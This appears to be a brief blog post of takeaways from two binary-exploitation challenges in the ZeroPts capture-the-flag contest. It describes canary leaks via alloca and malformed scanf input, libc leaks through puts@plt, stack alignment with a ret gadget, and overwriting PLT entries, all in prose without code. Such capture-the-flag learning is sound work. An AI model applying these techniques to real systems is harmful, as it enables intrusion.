ZeroPts CTF Pwn

Super awesome, learnt a lot! Still loads to learn, but getting there.

StopWatch:

  • Always google suspicious API calls such as alloca. This API allocates memory using the stack frame, allowing user to specially position something (stack canary) to be printed later! (DONT FORGET YOUR OSCP SKILLS……) This github repo below actually shared about alloca.
  • When doing printf of float values, the value is passed in stack (rsp+8).Screenshot below is trying to print 100.000000, and the value can be seen in rsp+8.
Sample printf float disassemby
Sample printf float code
  • Play with all user inputs (eg: invalid characters, size controls). By passing invalid characters, scanf did not manage to scan and overwrite the memory location, allowing us to print the value on the stack later on.
  • Using pop rdi and puts_plt to leak libc
  • When segmentation fault occurs, try to add some buffer/rop gadgets before actual payload. Check if the stack is aligned. Context: in local it works, but over remote fail… Added a ret gadget to align the stack and all is good!

Screenshot of flag cause i love flags:

OneShot:

  • Many steps in an exploit, do not just think of one stage.
  • There are many things you can overwrite! Context: Overwrite puts@plt to restart main but subsequently have no idea what or how to leak addresses. In fact, it is possible to overwrite the other plt addresses! In the end, it was necessary to overwrite exit@plt, calloc@plt. Also, can use printf to leak addresses! Also, you can jump anywhere, eg use exit@plt with a user supplied input to skip calloc.
  • Pay attention to your user input! Context: Using exit@plt with a user supplied input to skip calloc. Did not know how to skip calloc with exit@plt.

Screenshot of flag cause i love flags:

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store